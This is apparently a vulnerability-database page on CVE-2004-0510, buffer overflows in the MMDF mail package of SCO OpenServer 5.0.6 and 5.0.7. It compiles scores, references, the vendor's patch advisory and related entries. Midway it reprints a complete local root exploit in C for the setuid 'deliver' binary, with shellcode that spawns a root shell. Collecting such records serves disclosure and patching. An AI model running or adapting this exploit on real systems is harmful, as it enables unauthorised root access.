CVE-2004-0510
CVSS 7.2
Published: 2004-12-23 00:00:00
Last revised: 2016-10-17 22:45:49

[Original] Multiple buffer overflows in MMDF on OpenServer 5.0.6 and 5.0.7, and possibly other operating systems, may allow attackers to execute arbitrary code, as demonstrated via the execmail program.


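[CNNVD] OpenServer MMDF Multiple Buffer Overflow Vulnerabilities (CNNVD-200412-101)

        
        OpenServer is a commercial Unix-type operating system maintained by Caldera.
        The execmail program in OpenServer's MMDF package contains a buffer overflow; a local attacker can exploit this vulnerability to carry out a buffer overflow attack and elevate privileges.
        In addition, MMDF has NULL pointer dereference and core dump issues that can cause the application to crash.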
        

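- CVSS (Base Score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system shutdown]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]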

- CPE (Affected Platforms and Products)

cpe:/o:sco:openserver:5.0.6
cpe:/o:sco:openserver:5.0.6a
cpe:/o:sco:openserver:5.0.7

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0510
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0510
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-101
(Official data source) CNNVD

- Other Links and Resources

ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.7/SCOSA-2004.7.txt
(UNKNOWN)  SCO  SCOSA-2004.7
http://marc.info/?l=bugtraq&m=109889281711636&w=2
(UNKNOWN)  BUGTRAQ  20041027 MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
http://www.deprotect.com/advisories/DEPROTECT-20040206.txt
(UNKNOWN)  MISC  http://www.deprotect.com/advisories/DEPROTECT-20040206.txt
http://www.securityfocus.com/bid/10758
(VENDOR_ADVISORY)  BID  10758
http://xforce.iss.net/xforce/xfdb/16738
(VENDOR_ADVISORY)  XF  openserver-mmdf-bo(16738)

- Vulnerability Information

OpenServer MMDF Multiple Buffer Overflow Vulnerabilities
High risk  Boundary condition error
2004-12-23 00:00:00 2005-10-20 00:00:00
Remote ※ Local
        
        

- Advisories and Patches

        Vendor patch:
        Caldera
        -------
        The vendor has released an upgrade patch to fix this security issue; download it from the vendor's site:
        OpenServer 5.0.7
         4.1 Location of Fixed Binaries
         ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.7
         SCO OpenServer Release 5.0.7 Maintenance Pack 3 and later also include this patch:
        
        http://www.sco.com/support/update/download/osr507list.html.

        OpenServer 5.0.6
         5.1 Location of Fixed Binaries
         ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.7

- Vulnerability Information (602)

SCO Openserver 5.0.7 (MMDF deliver) Local Root Exploit (EDBID:602)
sco local
2004-10-26 Verified
0 Ramon Valle
N/A
/*
 *  MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
 *  Copyright 2004 Ramon de Carvalho Valle
 *
 */

char shellcode[]=           /*  36 bytes                          */
    "\x68\xff\xf8\xff\x3c"  /*  pushl   $0x3cfff8ff               */
    "\x6a\x65"              /*  pushl   $0x65                     */
    "\x89\xe6"              /*  movl    %esp,%esi                 */
    "\xf7\x56\x04"          /*  notl    0x04(%esi)                */
    "\xf6\x16"              /*  notb    (%esi)                    */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x68""/ksh"            /*  pushl   $0x68736b2f               */
    "\x68""/bin"            /*  pushl   $0x6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x50"                  /*  pushl   %eax                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\xb0\x3b"              /*  movb    $0x3b,%al                 */
    "\xff\xd6"              /*  call    *%esi                     */
;

main(int argc,char **argv) {
    char buffer[16384],address[4],*p;
    int i;

    printf("MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86\n");
    printf("Copyright 2004 Ramon de Carvalho Valle\n\n");

    *((unsigned long *)address)=(unsigned long)buffer-256+5120+4097;

    sprintf(buffer,"-c");
    p=buffer+2;
    for(i=0;i<5120;i++) *p++=address[i%4];
    for(i=0;i<8192;i++) *p++=0x90;
    for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
    *p=0;

    execl("/usr/mmdf/bin/deliver","deliver",buffer,0);
}



// milw0rm.com [2004-10-26]
		

- Vulnerability Information (F34740)

osx86_mmdfdeliver.c (PacketStormID:F34740)
2004-10-26 00:00:00
Ramon de C Valle  
exploit,x86,local,root
CVE-2004-0510

MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86.

- Vulnerability Information (F33830)

SCOSA-2004.7.txt (PacketStormID:F33830)
2004-07-20 00:00:00
 
advisory,overflow,vulnerability
CVE-2004-0510,CVE-2004-0511,CVE-2004-0512

SCO Security Advisory - Multiple vulnerabilities have been found in the MMDF binaries included with SCO Openserver versions 5.0.6 and 5.0.7. These include buffer overflows, null dereferences, and core dumps.



______________________________________________________________________________

			SCO Security Advisory

Subject:		OpenServer 5.0.6 OpenServer 5.0.7 : MMDF Various buffer overflows and other security issues
Advisory number: 	SCOSA-2004.7
Issue date: 		2004 July 14
Cross reference: 	sr884728 fz528322 erg712434 CAN-2004-0510 CAN-2004-0511 CAN-2004-0512
______________________________________________________________________________


1. Problem Description

	Deprotect discovered a buffer overflow in execmail.  After reviewing 
	our code we determined the whole MMDF package needed a security audit.

	Various buffer overflows and other security issues that affect all 
	MMDF binaries have been corrected. 

	All but one of the MMDF binaries that were setuid root are no 
	longer setuid. 

	Additional changes in this version of MMDF are documented at
	ftp://ftp.sco.com/pub/openserver5/507/mp/mp3/osr507mp3.html#rn507mp_mmdf
	and in the updated man pages which are included in SCOSA-2004.7

	The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned MMDF buffer overflows the name CAN-2004-0510.

	The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned MMDF null dereferences the name CAN-2004-0511.

	The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned MMDF core dumps the name CAN-2004-0512.

2. Vulnerable Supported Versions

	System			Binaries
	----------------------------------------------------------------------
	OpenServer 5.0.6 	MMDF Distribution
	OpenServer 5.0.7 	MMDF Distribution

3. Solution

	The proper solution is to install the latest packages.

4. OpenServer 5.0.7

	4.1 Location of Fixed Binaries

	ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.7

	The fixes are also available in SCO OpenServer Release 5.0.7 
	Maintenance Pack 3 or later.  See
	http://www.sco.com/support/update/download/osr507list.html.

5. OpenServer 5.0.6   

	5.1 Location of Fixed Binaries

	ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.7

	5.2 Verification

	MD5 (VOL.000.000) = 7d079342022ff408e479184fab3ee86b

	md5 is available for download from
		ftp://ftp.sco.com/pub/security/tools

	5.3 Installing Fixed Binaries

	Upgrade the affected binaries with the following sequence:

	1) Download the VOL* files to a directory

	2) Run the custom command, specify an install from media
	images, and specify the download directory as the location of
	the images.


6. References

	Specific references for this advisory:
		http://www.deprotect.com/advisories/DEPROTECT-20040206.txt

	SCO security resources:
		http://www.sco.com/support/security/index.html

	SCO security advisories via email
		http://www.sco.com/support/forums/security.html

	This security fix closes SCO incidents sr884728 fz528322
	erg712434.


7. Disclaimer

	SCO is not responsible for the misuse of any of the information
	we provide on this website and/or through our security
	advisories. Our advisories are a service to our customers
	intended to promote secure installation and use of SCO
	products.


8. Acknowledgments

	SCO would like to thank Deprotect which describes itself 
	as "a Swedish based security company divided into four 
	divisions; Managed Security Services, Security Services, 
	Products and Development and our Security Academy."

______________________________________________________________________________

    

- Vulnerability Information

8095
SCO OpenServer MMDF execmail Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability Description

A remote overflow exists in OpenServer. The execmail program fails to validate user input resulting in a buffer overflow. With a specially crafted request, an attacker can cause privilege escalation to root resulting in a loss of integrity.

- Timeline

2004-02-06 Unknown
2004-10-27 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, SCO has released a patch to address this vulnerability.

- Related References

- Vulnerability Credit

- Vulnerability Information

SCO Multi-channel Memorandum Distribution Facility Multiple Vulnerabilities
Boundary Condition Error 10758
Yes Yes
2004-07-20 12:00:00 2009-07-12 06:16:00
Discovery of the buffer overflow vulnerabilities is credited to the analysts at Deprotect. The individuals responsible for the discovery of the other issues are currently unknown; they were disclosed in the referenced vendor advisory.

- Affected Program Versions

SCO MMDF
+ SCO Open Server 5.0.7
+ SCO Open Server 5.0.6 a
+ SCO Open Server 5.0.6

- Vulnerability Discussion

It has been reported that the SCO Multi-channel Memorandum Distribution Facility (MMDF) is affected by multiple vulnerabilities. These issues are due to a failure of the utility to properly validate buffer boundaries when copying user-supplied input.

These issues are known to be exploitable locally; however, due to the nature of the application, it is likely that remote exploitation is possible as well, although this is not confirmed.

An attacker might leverage these issues to execute arbitrary code in the context of the vulnerable utility; many of the affected utilities are setuid binaries by default. These issues might also be leveraged to cause the affected utility to crash, denying service to legitimate users.

- Exploit

The following exploit is made available by Ramon de Carvalho Valle <ramondecarvalho@yahoo.com.br>:

- Solution

SCO has released advisory SCOSA-2004.7 along with fixes dealing with this issue.


SCO MMDF

- Related References

 

 
